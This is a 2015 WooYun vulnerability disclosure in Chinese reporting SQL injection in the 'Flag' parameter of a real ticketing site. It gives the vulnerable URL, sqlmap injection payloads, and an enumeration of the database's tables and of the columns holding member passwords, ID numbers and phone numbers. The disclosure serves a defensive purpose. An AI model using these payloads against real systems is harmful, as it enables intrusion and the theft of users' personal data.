当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152363

漏洞标题:中国票务中心某站存在SQL注入(可获取20万用户信息+大量记录信息)

相关厂商:中国票务中心

漏洞作者: 路人甲

提交时间:2015-12-07 11:27

修复时间:2016-01-21 11:30

公开时间:2016-01-21 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

没有提交重复吧!~~~趁着回来休息的时间测试一下,晚上都不知道搞到什么时候,所以先提交了!~~~

详细说明:

首先,地址是

http://www.51piao.com/Flight/FlightSale.aspx?Flag=2


Flag存在注入

http://www.51piao.com/Flight/FlightSale.aspx?Flag=2'


测试返回结果

“/”应用程序中的服务器错误。
字符串 ') order by [BeginTimeSort] asc' 之前有未闭合的引号。 第 1 行: ') order by [BeginTimeSort] asc' 附近有语法错误。
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。
异常详细信息: System.Exception: 字符串 ') order by [BeginTimeSort] asc' 之前有未闭合的引号。 第 1 行: ') order by [BeginTimeSort]
asc' 附近有语法错误。


这样应该是有注入了吧!~~~

[*] starting at 16:15:42
[16:15:42] [INFO] testing connection to the target URL
[16:15:44] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[16:15:45] [INFO] target URL is stable
[16:15:45] [INFO] testing if GET parameter 'Flag' is dynamic
[16:15:46] [INFO] confirming that GET parameter 'Flag' is dynamic
[16:15:47] [INFO] GET parameter 'Flag' is dynamic
[16:15:47] [WARNING] reflective value(s) found and filtering out
[16:15:47] [INFO] heuristic (basic) test shows that GET parameter 'Flag' might b
e injectable
[16:15:47] [INFO] testing for SQL injection on GET parameter 'Flag'
[16:15:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:15:52] [INFO] GET parameter 'Flag' seems to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable
[16:15:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[16:15:59] [INFO] GET parameter 'Flag' is 'Microsoft SQL Server/Sybase AND error
-based - WHERE or HAVING clause' injectable
[16:15:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:15:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[16:15:59] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[16:16:05] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[16:16:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:16:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:16:29] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[16:16:29] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[16:16:33] [INFO] target URL appears to have 1 column in query
[16:16:33] [INFO] GET parameter 'Flag' is 'Generic UNION query (NULL) - 1 to 20
columns' injectable
GET parameter 'Flag' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] N
sqlmap identified the following injection points with a total of 22 HTTP(s) requ
ests:
---
Place: GET
Parameter: Flag
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Flag=2) AND 4749=4749 AND (2763=2763
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Flag=2) AND 7428=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(120)+
CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (7428=7428) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(113)+CHAR(104)+CHAR(98)+CHAR(107)+CHAR(113))) AND (4091=4091
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: Flag=2) UNION ALL SELECT CHAR(113)+CHAR(117)+CHAR(120)+CHAR(109)+CH
AR(113)+CHAR(67)+CHAR(114)+CHAR(98)+CHAR(81)+CHAR(79)+CHAR(100)+CHAR(84)+CHAR(89
)+CHAR(65)+CHAR(83)+CHAR(113)+CHAR(104)+CHAR(98)+CHAR(107)+CHAR(113)--
---
[16:16:53] [INFO] testing Microsoft SQL Server
[16:16:53] [INFO] confirming Microsoft SQL Server
[16:16:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[16:20:37] [INFO] testing Microsoft SQL Server
[16:20:37] [INFO] confirming Microsoft SQL Server
[16:20:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[16:20:38] [INFO] fetching current user
current user: 'web61247'
[16:20:38] [INFO] fetching current database
current database: 'www_51piao_com'
[16:20:38] [INFO] testing if current user is DBA
current user is DBA: False
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] www_51piao_com
Database: www_51piao_com
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.OrderLog | 960682 |
| dbo.TicketPrice | 370811 |
| dbo.vMemberAll | 341363 |
| dbo.vTicketPrice | 248395 |
| dbo.MemberAddrBook | 205929 |
| dbo.OrderMain | 179388 |
| dbo.OprLog | 178075 |
| dbo.vEmailAll | 130014 |
| dbo.MemberPointLog | 126487 |
| dbo.TicketOrderDetail | 124568 |
| dbo.TicketOrderDetail | 124568 |
| dbo.TicketOrderDetail | 124568 |
| dbo.vTicketOrderStat | 124568 |
| dbo.vFlightTicketOrder | 121543 |
| dbo.SmsLog | 110904 |
| dbo.vTicketOrder | 106021 |
| dbo.vMobileTemp | 98098 |
| dbo.vMoibleAll | 98098 |
| dbo.vMobileAllOrder | 98088 |
| dbo.vMemberTemp | 93105 |
| dbo.MemberMoneyLog | 81838 |
| dbo.TicketPlay | 81607 |
| dbo.VTicketPlayMag | 81561 |
| dbo.FlightLog | 72994 |
| dbo.TrainNew | 70195 |
| dbo.TrainNew | 70195 |
| dbo.vLoginLog | 58664 |
| dbo.ImagesTicket | 37727 |
| dbo.monitor | 36593 |
| dbo.FlightOrderDetail | 31300 |
| dbo.FlightOrderDetail | 31300 |
| dbo.vFlightOrderDetail | 21042 |
| dbo.vFlightOrderDetail | 21042 |
| dbo.vTicketDetail | 14126 |
| dbo.vTicketMag | 14126 |
| dbo.OrderPayCard | 13596 |
| dbo.vOrderPayCard | 13596 |
| dbo.MemberLog | 11974 |
| dbo.vFlightTicketSend | 10295 |
| dbo.AccountAll | 8329 |
| dbo.TicketPreOrder | 6293 |
| dbo.vTicketAddrUse | 5225 |
| dbo.vTicketAddrUse | 5225 |
| dbo.TicketReview | 3253 |
| dbo.FlightLogStat | 2756 |
| dbo.vTicketReviewList | 2647 |
| dbo.FlightKM | 1398 |
| dbo.o_kehu | 1317 |
| dbo.ImagesCommon | 860 |
| dbo.WebTop | 858 |
| dbo.JOYCOMPANY | 786 |
| dbo.VJoyCompanyMag | 786 |
| dbo.VJoyCompanyMag | 786 |
| dbo.LinkInfo | 780 |
| dbo.CITY | 647 |
| dbo.AgentInfo | 526 |
| dbo.VChinaCity | 455 |
| dbo.VNewsHelp1 | 416 |
| dbo.VNewsHelp1 | 416 |
| dbo.PointProductOrder | 293 |
| dbo.PointProductOrder | 293 |
| dbo.vTicketBig | 280 |
| dbo.vTicketHomeTop | 279 |
| dbo.MemberWebUnion | 210 |
| dbo.vTicketLeft | 176 |
| dbo.vTicketSmall | 155 |
| dbo.FlightCityCode | 152 |
| dbo.FlightSale | 144 |
| dbo.VFlightSale | 141 |
| dbo.Area | 131 |
| dbo.Users | 116 |
| dbo.vUserMag | 116 |
| dbo.BlackIp | 103 |
| dbo.REGION | 96 |
| dbo.vTrainTrade | 65 |
| dbo.TrainTradeBak | 60 |
| dbo.TrainTradeBak | 60 |
| dbo.NewsHelpModule | 57 |
| dbo.NewsHelpModule | 57 |
| dbo.sysconstraints | 54 |
| dbo.vPointProduct1 | 44 |
| dbo.vPointProduct1 | 44 |
| dbo.VTravelLine1 | 35 |
| dbo.VTravelLine1 | 35 |
| dbo.vTravelLineDetail | 35 |
| dbo.Province | 34 |
| dbo.vMobileAllTrain | 26 |
| web61247.pangolin_test_table | 26 |
| dbo.vTicketTypeCount | 22 |
| dbo.vTicketTypeCount | 22 |
| dbo.TempSql | 17 |
| dbo.vJoyCompanyTop | 17 |
| dbo.TicketType | 14 |
| dbo.OrderPayMethod | 12 |
| dbo.FlightSpec | 11 |
| dbo.vFlightSpec | 11 |
| web61247.D99_Tmp | 11 |
| dbo.MemberGroup | 10 |
| dbo.SmsTemplate | 10 |
| dbo.vSmsTemplate | 10 |
| dbo.vTemp | 10 |
| dbo.BaseCreditCard | 9 |
| dbo.WebModule | 9 |
| dbo.vWebCity | 8 |
| dbo.WebCity | 8 |
| dbo.BlackList | 7 |
| dbo.SmsEvent | 7 |
| dbo.BbsBanner | 6 |
| dbo.Groups | 6 |
| dbo.OrderFlightTakeAddr | 6 |
| dbo.PointProductType | 5 |
| dbo.vHomeTicket | 5 |
| dbo.vSmsModule | 5 |
| dbo.vHotelOrder | 4 |
| dbo.syssegments | 3 |
| dbo.BaseYesNo | 2 |
| dbo.FlightTicketAddr | 2 |
| dbo.PriceType | 2 |
| dbo.CompanySeq | 1 |
| dbo.FlightSaleTop | 1 |
| dbo.OrderSeq | 1 |
| dbo.TravelCompany | 1 |
+------------------------------+---------+
不知道获取整个数据库的count的时候member没有了,还好上次测试的时候发现有members这个,所以似乎用户又多了一些了!~~~
Database: www_51piao_com
+--------------+---------+
| Table | Entries |
+--------------+---------+
| dbo.Member | 198778 |
| dbo.vMember | 198778 |
| dbo.Users | 116 |
| dbo.vUserMag | 116 |
+--------------+---------+
Database: www_51piao_com
Table: Users
[9 columns]
+---------------+
| Column |
+---------------+
| Account |
| ID |
| IsDisabled |
| LastLoginTime |
| LEVELID |
| LoginCount |
| Password |
| PurView |
| UserName |
+---------------+
Database: www_51piao_com
Table: vUserMag
[10 columns]
+---------------+
| Column |
+---------------+
| Account |
| DepartName |
| ID |
| IsDisabled |
| LastLoginTime |
| LEVELID |
| LoginCount |
| Password |
| PurView |
| UserName |
+---------------+
Database: www_51piao_com
Table: Member
[43 columns]
+---------------+
| Column |
+---------------+
| Account |
| Address |
| Balance |
| BirthDay |
| CardNo |
| CardType |
| CityId |
| COMPANYADDR |
| CompanyId |
| CompanyName |
| COMPANYTEL |
| CompanyType |
| Degree |
| Email |
| FAX |
| GroupId |
| ID |
| ISAuditing |
| IsBindMobile |
| IsChinese |
| IsDesignWeb |
| IsDisabled |
| IsMailList |
| IsWeb |
| LastLoginTime |
| LoginCount |
| MemberType |
| MEMO |
| MOBILE |
| Name |
| NickName |
| openid |
| POINT |
| ProvinceId |
| Pwd |
| RegDate |
| SEX |
| STAFFID |
| STAFFNAME |
| TEL |
| VipMoney |
| VipNo |
| ZIPCODE |
+---------------+
Database: www_51piao_com
Table: vMember
[45 columns]
+---------------+
| Column |
+---------------+
| Account |
| Address |
| Balance |
| BirthDay |
| CardNo |
| CardType |
| City |
| CityId |
| COMPANYADDR |
| CompanyId |
| CompanyName |
| COMPANYTEL |
| CompanyType |
| Degree |
| Email |
| FAX |
| GroupId |
| GroupName |
| ID |
| ISAuditing |
| IsBindMobile |
| IsChinese |
| IsDesignWeb |
| IsDisabled |
| IsMailList |
| IsWeb |
| LastLoginTime |
| LoginCount |
| MemberType |
| MEMO |
| MOBILE |
| Name |
| NickName |
| openid |
| POINT |
| ProvinceId |
| Pwd |
| RegDate |
| SEX |
| STAFFID |
| STAFFNAME |
| TEL |
| VipMoney |
| VipNo |
| ZIPCODE |
+---------------+


1.jpg


2.jpg


3.jpg


4.jpg


数据挺大的,就不继续了!~~~~而且时间关系,赶着出去,也就不往下测试了,明天再测试其他的!~~~

漏洞证明:

如上

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝